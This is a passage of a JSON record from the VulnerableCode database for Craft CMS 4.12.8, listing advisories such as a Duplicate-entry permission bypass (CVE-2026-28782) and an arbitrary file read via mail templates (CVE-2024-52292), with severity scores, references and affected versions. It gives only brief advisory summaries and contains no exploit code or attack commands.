ties/VCID-vasz-rnn1-67ev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50642?format=json","vulnerability_id":"VCID-w9yn-1573-hyau","summary":"Craft CMS has Permission Bypass and IDOR in Duplicate Entry Action\nThe \"Duplicate\" entry action does not properly verify if the user has permission to perform this action on the specific target elements.\nEven with only \"View Entries\" permission (where the \"Duplicate\" action is restricted in the UI), a user can bypass this restriction by sending a direct request.\n\nFurthermore, this vulnerability allows duplicating **other users' entries** by specifying their Entry IDs. Since Entry IDs are incremental, an attacker can trivially brute-force these IDs to duplicate and access restricted content across the system.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28782","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13004","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28782"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/fb61a91357f5761c852400185ba931f51d82783d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:34:53Z/"}],"url":"https://github.com/craftcms/cms/commit/fb61a91357f5761c852400185ba931f51d82783d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28782","reference_id":"CVE-2026-28782","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28782"},{"reference_url":"https://github.com/advisories/GHSA-jxm3-pmm2-9gf6","reference_id":"GHSA-jxm3-pmm2-9gf6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jxm3-pmm2-9gf6"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-jxm3-pmm2-9gf6","reference_id":"GHSA-jxm3-pmm2-9gf6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-04T17:34:53Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-jxm3-pmm2-9gf6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28782","GHSA-jxm3-pmm2-9gf6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w9yn-1573-hyau"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56174?format=json","vulnerability_id":"VCID-chep-xthg-zuee","summary":"Craft CMS Arbitrary System File Read\nBy abusing the mail notification template it is possible to read arbitrary operating system files.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52292","reference_id":"","reference_type":"","scores":[{"value":"0.00428","scoring_system":"epss","scoring_elements":"0.62805","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52292"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52292","reference_id":"CVE-2024-52292","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52292"},{"reference_url":"https://github.com/advisories/GHSA-cw6g-qmjq-6w2w","reference_id":"GHSA-cw6g-qmjq-6w2w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-cw6g-qmjq-6w2w"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-cw6g-qmjq-6w2w","reference_id":"GHSA-cw6g-qmjq-6w2w","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-13T18:52:42Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-cw6g-qmjq-6w2w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83232?format=json","purl":"pkg:composer/craftcms/cms@4.12.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.12.8"},{"url":"http://public2.vulnerablecode.io/api/packages/83231?format=json","purl":"pkg:composer/craftcms/cms@5.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.9"}],"aliases":["CVE-2024-52292","GHSA-cw6g-qmjq-6w2w"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-chep-xthg-zuee"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.12.8"}